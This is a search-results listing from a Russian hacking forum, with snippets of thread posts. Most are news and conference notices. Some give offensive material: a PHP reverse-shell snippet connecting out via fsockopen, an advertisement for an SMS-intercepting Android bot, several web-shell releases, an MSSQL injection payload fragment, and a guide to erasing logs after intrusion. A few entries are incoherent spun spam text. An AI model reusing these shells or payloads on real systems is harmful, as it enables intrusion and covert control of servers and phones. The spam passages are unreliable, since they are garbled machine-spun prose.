234 matches found
Приглашаем на вебинар!
Всем привет! Приглашаем Вас на презентацию новой версии Zecurion DLP 10, которая состоится в четверг 13 февраля, в 12:00 GMT+3 Регистрация: https://attendee.gotowebinar.com/register/2238015640962285325?source=rdot В течение часа технический директор Роман Васильев и заместитель генерального...
What is BAT and why you should install Brave Browser?
BAT is an Ethereum token that powers Brave Software's blockchain-based digital advertising platform. Internet users who browse the web using Brave's free web browser available at can choose to replace the ads they see with ads on Brave's ad network. Users then receive BAT from advertisers as...
Работа по всей территории РФ
НАБИРАЕМ ПЕРСОНАЛ - Возможность зарабатывать от 5000 рублей в день. - График работы гибкий. - Выплаты стабильно, без задержек - еженедельно. - Предоставляем помощь в переезде при необходимости - Приём на работу строго от 18 лет По вопросам трудоустройства пишите НАШИ КОНТАКТЫ: Telegram:...
Название Бота Stepa
Возможности Бота + Админ панель Защита от DDos; + Отправка, перехват и удаление СМС-сообщений; + Отображение ботов по категория; + Есть удобная система событий для каждого бота; + Удобный вывод СМС сообщений в диалоге; + Автокрипт apk через api + Отдельная услуга; + Смена и подмена...
SecuriTeam Secure Disclosure
Hi all, In the past 10 years Beyond Security runs a vulnerability disclosure program called SecurTeam Secure Disclosure SSD. We are looking to acquire high end vulnerabilities in various stages of research, PoC and similar. We also runs Hack2Win online competition. Hack2Win online is a hacking...
Hehdirb
Выложил недавно поделие для пайплайн-дирбастинга. Ссылка: В силу криворукости правильно обрабатываю не все эксепшны и не очень правильно работаю с gevent, но в таком виде на многих хостах тоже выжимает сильно больше, чем обычный dirbuster. Тулза может сама бинарным поиском определить максимальное...
LAVABIT is back with DARKMAIL
Знаменитый сервис lavabit возвращается 20.01.2017, разработав новую систему DARKMAIL...
Деанонимизация пользователей Darknet(TOR, i2p(d), etc) & SOX &VPN аудиозакладками
Вообщем то ссылка на 33с3 уже была запощена в основном топике, но я хотел бы акцентировать общее внимание на презентацию Talking Behind Your Back On the Privacy & Security of the Ultrasound Tracking Ecosystem от Vasilios Mavroudis и Federico Maggi. Вкратце, суть такова: В 2012 году была основана...
Best tips :: HCG Game cheats Drops - Avoid Expensive Injections
As menopause decreases the degrees of estrogen, it ought to come as no real surprise more and more fat are going to be deposited around the entire body and particularly from the abdominal area. The metabolism will suffer too, causing excess weight gain and reduced vitality. While every one of the...
The Quickest Way to Proteine Mass - How To Increase Your Mass Naturally
Many reasons causing obesity in todays lifestyles, people always blame increasing rates of obesity high-calorie diet, popular array of refined foods, lack of exercise and modern it truly is generally excessive pressure and lots of additional factors. Some other things might soon be put into this...
bash и ядро Linux в windows 10 anniversary update
Тут на днях 2 Августа подъехало новое обновление для Windows 10 "anniversary update" так вот самый интересной фишкой мне кажется будет bash в окнах. Обновление пока что доступно не всем регионам. По умолчанию bash не "включен". Если у вас версия ОС выше 1511 значит вы обладатель данного обновлени...
Okinawa Night Life by Hiromi Tso
Well, there we were once because similar position and decided we we will make the effort required to uncover the strategies to the complete thing you would like. It can almost appear to be an impossible task while wading with the incredible levels of false advertising, bull crap claims and merely...
Song Companies For i-tunes Library
A successful hen night Brighton should start which has a guest list. Before you decide for the type of activities you want for just a hen's night, you should choose the quantity of consumers are usually a component of becoming it will not just decide your financial budget, but it really may also...
ОБНОВИ Firefox СЕЙЧАС!
На всякий случай создам, для тех кто не следит за новостями и отключил автообновы. Дырка позволяет сливать файлы с HDD, эксплуатируется уже больше недели. Возможно, вас уже взломали. Имеет смысл вытащить маску файлов из JS и просканить свой винт, посмотреть - было ли что важное в найденных файлах...
Взлом Hacking Team
В рунете тишина, давайте обсудим. Цитата: @cBekrar: I think I've spotted the name of the guy who sold the Windows Kernel EoP 0day to Hackingteam, 25K EUR is a decent price. --- Я думал все куда лучше, а тут директор vupen пишет, что это decent price...
Burp Suite Tutorial
Ребята из bugcrowd начали записывать видео-руководство по использованию программы Burp Suite Видео ENG: Hacking with Burp Suite - Tutorial 1 Вопросы по курсу...
Встреча Defcon Moscow #9
3 июля, в пятницу, в офисе Mail.Ru Group состоится девятая встреча Defcon Moscow, которую организует группа DC7499. Defcon Moscow — это открытое и независимое сообщество технических энтузиастов, приближенных к области высоких технологий, а также информационной и технической безопасности. Программ...
Третья конференция r0 Crew
Всем доброго времени суток! Рады сообщить, что 23.05.2015 состоится третья конференция форума reverse4you.org R0-Crew Conference. Основная тематика конференции: Реверс-инжиниринг. Низкоуровневое программирование. Поиск уязвимостей. Место проведения осталось прежним, это учебный центр «Славутич»...
PHP reverse eval shell
Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...
Хакеры «украли» Рождество у геймеров Xbox Live и PlayStation
Настоящему геймеру нет ничего приятнее, чем в новогоднюю/рождественскую ночь уединиться с игровой приставкой и оторваться по полной, когда все вокруг радуются смене последнего разряда в номере года. К сожалению, в этом году хакерская группа Lizard Squad подложила геймерам большую свинью, испортил...
ZeroNights 2014: запретных тем нет
ZeroNights 2014: запретных тем нет До старта конференции ZeroNights 2014 остается совсем немного времени. Скоро площадка для встречи специалистов-практиков по ИБ, исследователей, программистов, звезд хакерского мира, да и просто хороших друзей и знакомых откроет свои двери навстречу новому. В это...
Tor-маршрутизатор Anonabox
Tor-маршрутизатор Anonabox задолго до завершения кампании на Кикстартере собрал необходимое число заказов. Более того, устройство стоимостью $45 намного перевыполнило «план». Вместо необходимых $7500 на эту минуту собрано уже $215 000 прим.м99.: сегодня собрано уже $604,386. И это только за первы...
Russia Security Newsline или новости о безопасности по-русски
Начинаем наполнять форум жизнью, а какая может быть жизнь без общения, новостей и статьей ? Правильно, форум загнется. И если с первым особых проблем нет, хоть и мало этого общения, то с новостями совсем уж нечего просмотреть хотя достаточное ли кол-во читает их на форумах, обсосанные и не свежие...
Вышла операционная система OpenWrt 14.07
Встроенная операционная система OpenWrt обновилась до версии 14.07. Эту ОС часто устанавливают на маршрутизаторах как замену проприетарным прошивкам. Основные компоненты OpenWrt включают в себя ядро Linux, util-linux, uClibc и BusyBox. Размер всех компонентов минимизирован, чтобы работать на...
Люди готовы "на всё" ради бесплатного WiFi
Специалисты из компаний F-Secure, Британского института по информационной безопасности и немецкой компании SySS провели совместное исследование, насколько обычные пользователи готовы подключаться к бесплатному хотспоту, даже если это подключение представляет потенциальную опасность. Для проверки,...
MySQL: новый Geometric error-based
Привет! я не говорю России, так что я собираюсь объяснить это на английском языке. earlier today, i got some spare time, and played a little with the function GeometryCollection. basically, this function constructs geometry collection. sounds nice. but the interesting part is, we can only use it...
Retrieving all tables and their columns at once MSSQL
In the Name of ALLAH the Most Beneficent and the Merciful Zenodermus, Ch3rn0by1 and Me was workinn on MSSQL.. when Zenodermus thought to make a DIOS for MSSQL.. previously at Код: http://websec.ca/kb/sqlinjection DIOS is under the heading Retrieving Multiple Tables and Columns Код: AND 1=0; BEGIN...
Реверс и отладка x64 [win]
Всем привет! В этой статье я хочу рассказать об инструментальных средствах отладки 64-х битных приложений под Windows, а именно об IDA Pro. Не будет долгих речей и вступлений, перейдём сразу к делу. При реверсе 32-х битных приложений, реверсеру предоставляется богатый выбор инструментальных...
MySQL: Альтернативные error-based векторы
Всем привет! Шокирующая рубрика продолжается, а значит придется вновь делать невозможное! Сегодня на повестке дня альтернативные error-based векторы. Это очень важная и актуальная тема. Об одном из них сейчас я хотел бы рассказать поподробнее. Буду краток, вектор основывается на ошибке переполнен...
Java Faces Miniwebshell
Всем привет, немного посмотрел java server faces. Если у вас есть возможнось загрузить shell.xhtml и как-то проинклудить его, то вот небольшой вебшелл. Соус в том, что мы не можем создавать переменные или что-то куда-то нормально присваивать. Но можем вызывать стейтменты, подгружать классы и в...
PHP: Теория выражений
Всем привет! Сегодня хотелось бы поговорить о выражениях; о том, что они из себя представляют. Нет, это не невнятная публикация представляющая из себя выдержки c манов и ссылки. Сначала небольшой экскурс, а затем, новая и полезная информация. Примечание: Если у вас отключен тег img, перейдите на...
Зачистка следов в боевой обстановке
Зачистка следов в боевой обстановке Всем привет! В этой статье, я хочу рассказать о логах в ОС Linux и необходимости очистки логов в боевой обстановке, например, во время взлома пен-теста или вардрайвинга. Содержание Введение 1. Логи в Linux 2. Очистка лог файлов 3. Wardriver Log Cleaner 4...
Перенос таблицы импорта
Всем привет! В этой статье я расскажу о работе с исполняемыми файлами PE-формата, а именно о работе с таблицей импорта. Возникла необходимость перенести таблицу импорта. Перенести в другую секцию, либо в пределах одной секции. В данном случае перенос таблицы импорта осуществляется в пределах одно...
[Кодинг] Основы низкоуровневой оптимизации
Примеры, описанные в статье, носят исключительно академический характер. Всем привет. Хотелось бы рассказать об основах этого нелегкого, но интереснейшего занятия. В качестве рабочего инструмента я буду использовать язык программирования C++, а конкретнее — компилятор g++. Так как само название...
[Firefox] убираем кодирование кавычек в URL | Firefox URL quote encoding patch
See next post for English description! Патч призван устранить кодирование кавычек ',", в HTTP запросах. Начиная с версии 3.0 коммит, Firefox стал урл-кодировать одинарную кавычку ' в %27. Данное поведение нередко может помешать обнаружить SQL инъекцию в веб-приложениях, например, при участии...
MySQL: Обход фильтрации символов в имени колонок
Прим.: Вариант, который потерялся, и о котором никто не напомнил: https://rdot.org/forum/showpost.php?...2&postcount=10 Материал ниже все равно может быть полезен при изучении специфических SQL-запросов в MySQL и при некоторых типах WAF. ------------ Недавно, изучая одну уязвимость возникла...
Инъекция в ORDER BY: Второе дыхание
Почему-то у многих людей сложилось мнение, что инъекция в order by раскручивается или через time-based, или как boolean-based. Но, это совсем не так. INTRO ORDER BY употребляется для сортировки выборки по одной или несколькими колонками обычно по возрастанию или убыванию, но не только: PHP код:...
MySQL: Вытягивание записей в строку с использованием встроенной функции insert
Все вы знаете о выводе колонок MySQL таблицы в одну строку, итак, встречаем - Четвертый метод! Но об этом немного позже, а сейчас вспомним то, что имеется на сегодняшний день. Из статьи Dr.Z3r0: MySQL SQL Injection полный FAQ: 1. groupconcat + Простое использование, небольшой размер - Ограничение...
tcp(port&seq) backdoor
Автор: slashd Что это? Реализации скрытого канала передачи данных на сервер с помощью стандартных полейв нашем случае поля SEQ и Source Port TCP-заголовка. Теоритическая часть. Реализовать скрытую передачу данных с помощью TCP-заголовка можно несколькими способами. Клиентхакер иницирующий...
Один сервер, Tor и Bitcoin
Всем доброго времени суток. В последнее время достаточно много новостей о Tor и Bitcoin, обе системы в достаточной мере направлены на безопасность и анонимность, однако их преимущества могут одновременно стать и недостатками. Структура Tor не позволяет определять местоположение клиента и сервера,...
В сеть выложена база данных carder.pro
По данным портала Carder.pw и ряда пользователей Carder.pro база данных форума была выложена в публичный доступ еще в начале мая. Это произошло в результате инцидента при смене хостинга порталом. В ходе действий украинских оперативников по слежке за форумом киберпреступников произошла утечка...
K-Shell by kikicoco VHS version 1.2 edition (.aspx)
Данная утилита предназначенна для системных администраторов для удаленного управления своим сервером. Любое незаконное использование скрипта преследуется по закону. last update: 06.05.2013 21:20 Что может: Wso-style Server IP Client IP HostName Username OS Version IIS Version System Dir...
PHDays 2013 hackquest
Кто еще не в курсе, вот здесь: hackquest.phdays.com розыгрываются 20 билетов и 20 фирменных футболок PHDays 2013, который пройдет в Москве 23-24 мая Всем удачи!...
Cfm Shell v3.0 edition
Данная утилита предназначенна для системных администраторов для удаленного управления своим сервером. Любое незаконное использование скрипта преследуется по закону. last update: 14.04.2013 14:06 Что может: Server IP Client IP Gateway Interface Server Name Server Protocol Server Software Appserver...
Проверь Badoo на прочность! Месяц поиска уязвимостей
Цитата: Компания Badoo, вслед за своими коллегами ― крупнейшими представителями IT-индустрии, такими как Google, Facebook и Яндекс, начинает платить за найденные уязвимости. Мы объявляем конкурс «Проверь Badoo на прочность!», который стартует 19 марта и продлится ровно месяц. Участвовать в конкур...
Скайполомка - изучаем механизмы авторизации Skype
Вступление Изначально была задача «Нужен брут под Skype», потом было море интереснейшего геморроя и открытий. А сейчас перерыв перед последним рывком в реализации и я решил написать эту статью. Пусть будет больше софта хорошего и «разного», а то обделен им наш любимый SkypeTM. Хочу быстро и не...
WSO manager edition 1.0
Сделан на основе WSO manager на файлах | WSO web-shells manager edition files - no MySql & etc. Данная утилита предназначенна для системных администраторов для удаленного управления своими серверами. Любое незаконное использование скрипта преследуется по закону. было: 1. Добавление шеллов по...
Атаки через Request-Path + Баги IE
На эту тему скоро будет статейка на пару страниц прим. Хакер, апрель 2013. Идея ужасно банальная, но результат тестирования очень удивил + обнаружены интересные баги. Зачастую при тестировании забывают, что небезопасно могут обрабатываться не только Get/Post/Cookie параметры, но и Request-URI /...
Google запустил собственный сервис слежения за Санта-Клаусом!
Google запустила сервис, который позволит следить за перемещениями саней Санта-Клауса в католический сочельник 24 декабря. Об этом компания сообщила в своем блоге. С помощью сервиса, который получил название Santa Tracker, можно будет узнать, в каком городе находится Санта-Клаус, куда он поедет...
ООН внедряет механизм "шпионажа" за пользователями Сети
На Всемирной конференции по международной электросвязи ВКМЭ 2012 был утвержден стандарт по применению технологии DPI Deep Packet Inspection. Если этот инструмент действительно будет внедрен, конфиденциальность многих пользователей может оказаться под угрозой, пишет CNET. ООН внедряет механизм...